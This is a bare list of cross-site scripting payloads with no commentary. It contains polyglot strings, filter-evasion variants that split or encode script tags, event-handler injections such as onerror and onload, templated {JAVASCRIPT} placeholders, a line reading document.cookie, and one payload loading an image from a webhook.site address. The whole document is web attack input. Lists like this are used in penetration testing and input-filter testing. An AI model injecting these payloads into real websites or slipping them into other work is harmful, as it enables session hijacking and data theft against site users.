
ava/script:"/*`/*\`/*"/*\"/*-/*);/*<!--></script></style></textarea></template></noscript></noembed></select>--><<svg/autofocus/onload=/*confirm(/shahmibro/.source)/*/c=confirm,c(69)//
"-top[%27al\x65rt%27](%27sailay%27)-"
"-alert``-"
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
< img//////src=https://webhook.site/bc5f9f62-9936-46c9-8649-e745d8f62562 oNIY=1 style="display:none;" oNerror=alert(1)//
<svg onmouseover=print(1)>.svg
1vu3ay<script>alert(document.domain)<%2fscript>ou72f
admin'%3balert(String%2efromCharCode(88,83,83))%2f%2f%5c'%3balert(String%2efromCharCode(88,83,83))%2f%2f%22%3balert(String%2efromCharCode(88,83,83))%2f%2f%5c%22%3balert(String%2efromCharCode%3cscript%3ealert('xss')%3c%2fscript%3e
admintest%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest
Test1<script>alert(1)</script>Test1
Test\" onmouseover=\"alert(1)\" style=display:block>
%3Cscript%3Ealert(document.domain)%3C%2fscript%3E
<p><img src=\'x\' onerror=alert(1)></p>
“&gt;&lt;img src=x onerror=alert(document.cookie)&gt;
<script>{JAVASCRIPT}</script>
<scr ipt>{JAVASCRIPT}</scr ipt>
"><script>{JAVASCRIPT}</script>
"><script>{JAVASCRIPT}</script><"
'><script>{JAVASCRIPT}</script>
'><script>{JAVASCRIPT}</script><'
<SCRIPT>{JAVASCRIPT};</SCRIPT>
<scri<script>pt>{JAVASCRIPT};</scr</script>ipt>
<SCRI<script>PT>{JAVASCRIPT};</SCR</script>IPT>
<scri<scr<script>ipt>pt>{JAVASCRIPT};</scr</sc</script>ript>ipt>
";{JAVASCRIPT};"
';{JAVASCRIPT};'
;{JAVASCRIPT};
{JAVASCRIPT};
<SCR%00IPT>{JAVASCRIPT}</SCR%00IPT>
\";{JAVASCRIPT};//
<STYLE TYPE="text/javascript">{JAVASCRIPT};</STYLE>
<<SCRIPT>{JAVASCRIPT}//<</SCRIPT>
"{EVENTHANDLER}={JAVASCRIPT} 
<<SCRIPT>{JAVASCRIPT}//<</SCRIPT>
<img src="1" onerror="{JAVASCRIPT}">
<img src='1' onerror='{JAVASCRIPT}'
onerror="{JAVASCRIPT}"
onerror='{JAVASCRIPT}'
onload="{JAVASCRIPT}"
onload='{JAVASCRIPT}'
<IMG """><SCRIPT>{JAVASCRIPT}</SCRIPT>">
<IMG '''><SCRIPT>{JAVASCRIPT}</SCRIPT>'>
"""><SCRIPT>{JAVASCRIPT}
'''><SCRIPT>{JAVASCRIPT}'
<IFRAME SRC='f' onerror="{JAVASCRIPT}"></IFRAME>
<IFRAME SRC='f' onerror='{JAVASCRIPT}'></IFRAME>

#!allowed - "'<>/():,=
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
'><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

ava/script:"/*`/*\`/*"/*\"/*-/*);/*<!--></script></style></textarea></template></noscript></noembed></select>--><<svg/autofocus/onload=/*confirm(/shahmibro/.source)/*/c=confirm,c(69)//
shahmidoe:onerror=alert}=0,throw 1337;